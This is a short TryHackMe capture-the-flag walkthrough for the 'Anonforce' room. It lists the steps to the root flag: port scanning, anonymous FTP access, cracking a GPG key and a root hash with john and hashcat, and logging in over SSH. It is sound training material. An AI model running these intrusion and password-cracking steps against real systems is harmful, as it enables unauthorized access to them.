Skip to main content
  1. TryHackMe/

Anonforce

loading · loading · · ·

Enumeration

  • rustscan -a $ip, 21:ftp 22:ssh
  • ftp $ip, anonymous
  • user = m*******
  • get user.txt
  • cat ~/user.txt
  • get /notread/*

Hash

  • gpg2john private.asc > private.hash
  • john --wordlist=/rockyou.txt private.hash
  • x******
  • gpg 🔗 🔗
  • gpg -d backup.pgp
  • nano root.hash
  • hashcat root.hash rockyou.txt
  • h*****

SSH

  • ssh root@$ip

Related

Bounty Hacker
loading · loading
Coldbox Easy
loading · loading
Content Discovery
loading · loading